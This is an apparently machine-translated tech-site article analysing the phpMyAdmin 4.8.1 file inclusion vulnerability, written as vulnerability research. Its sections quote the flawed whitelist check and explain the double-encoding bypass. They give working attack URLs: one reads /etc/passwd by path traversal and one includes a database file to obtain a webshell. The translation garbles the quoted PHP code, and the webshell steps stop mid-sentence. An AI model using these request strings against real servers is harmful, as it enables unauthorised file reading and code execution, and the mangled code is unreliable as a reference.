Shulou(Shulou.com)05/31 Report--

This article shares with you the content of the sample analysis contained in any file in phpmyadmin 4.8.1. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Phpmyadmin 4.8.1 any file contains a brief description of 0x00 phpmyadmin

PhpMyAdmin is a database management tool based on PHP and constructed on the host of the website in the way of Web-Base, which allows managers to use Web interface to manage MySQL database. Through this Web interface, it can become a better way to input complicated SQL syntax in a simple way, especially to deal with the import and export of a large amount of data. One of the bigger advantages is that phpMyAdmin runs on the web server like other PHP programs, but you can use the HTML pages generated by these programs anywhere, that is, to manage the MySQL database remotely, and to easily create, modify, and delete databases and tables. You can also use phpMyAdmin to establish a commonly used php syntax to facilitate the correctness of sql syntax needed when writing web pages.

0x01 affects version

Phpmyadmin 4.8.1

The previous version was not tested

Note: you need to log in to phpmyadmin to make use of

0x02 vulnerability analysis

View index.php 55 lines 63 lines of code

If (! Empty ($_ REQUEST ['target']) & & is_string ($_ REQUEST [' target']) & &! Preg_match ('/ ^ index/', $_ REQUEST ['target']) &! In_array ($_ REQUEST ['target'], $target_blacklist) & & Core::checkPageValidity ($_ REQUEST [' target']) {include $_ REQUEST ['target']; exit;}

The condition is true (condition):

$_ REQUEST ['target'] cannot be empty

$_ REQUEST ['target'] is a string

$_ REQUEST ['target'] cannot start with index

$_ REQUEST ['target'] cannot be in $target_blacklist; and $target_blacklist = array (' import.php', 'export.php')

Need to satisfy Core::checkPageValidity ($_ REQUEST ['target'])

Core::checkPageValidity ($_ REQUEST ['target']), view phpMyAdmin1\ libraries\ classes\ core.php

The specific code of checkPageValidity function:

Public static function checkPageValidity (& $page array $whitelist = []) {if (empty ($whitelist)) {$whitelist = self::$goto_whitelist;} if (! Isset ($page) | |! is_string ($page) {return false;} if (in_array ($page, $whitelist)) {return true;} $_ page = mb_substr ($page, 0, mb_strpos ($page.) ); if (in_array ($_ page, $whitelist)) {return true;} $_ page = urldecode ($page); $_ page = mb_substr ($_ page, 0, mb_strpos ($_ page. )); if (in_array ($_ page, $whitelist)) {return true;} return false;}

The code with the problem:

$_ page = urldecode ($page); $_ page = mb_substr ($_ page, 0, mb_strpos ($_ page. '?','?); if (in_array ($_ page, $whitelist)) {return true;}

If you include% 253 in the requested link, you can bypass it. The links that can be constructed are:

Db_sql.php%253/../../etc/passwd

Db_sql.php can be replaced with:

'db_datadict.php', 'db_sql.php',' db_events.php', 'db_export.php',' db_importdocsql.php', 'db_multi_table_query.php',' db_structure.php', 'db_import.php',' db_operations.php', 'db_search.php',' db_routines.php' 'export.php', 'import.php',' index.php', 'pdf_pages.php',' pdf_schema.php', 'server_binlog.php',' server_collations.php', 'server_databases.php',' server_engines.php', 'server_export.php',' server_import.php' 'server_privileges.php', 'server_sql.php',' server_status.php', 'server_status_advisor.php',' server_status_monitor.php', 'server_status_queries.php',' server_status_variables.php', 'server_variables.php',' sql.php', 'tbl_addfield.php' 'tbl_change.php', 'tbl_create.php',' tbl_import.php', 'tbl_indexes.php',' tbl_sql.php', 'tbl_export.php',' tbl_operations.php', 'tbl_structure.php',' tbl_relation.php', 'tbl_replace.php' 'tbl_row_action.php', 'tbl_select.php',' tbl_zoom_select.php', 'transformation_overview.php',' transformation_wrapper.php', 'user_password.php'

0x03 obtains webshell through file inclusion

The prerequisite first knows the path to the database.

View the path to the current database:

Show variables like 'datadir'

I created a new database tt, added a table to the tt database, and inserted the

Then visit: http://localhost/phpMyAdmin1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/tet/tt.MYD

Thank you for reading! On "phpmyadmin 4.8.1 any file contains sample analysis" this article is shared here, I hope the above content can be of some help to you, so that you can learn more knowledge, if you think the article is good, you can share it out for more people to see it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.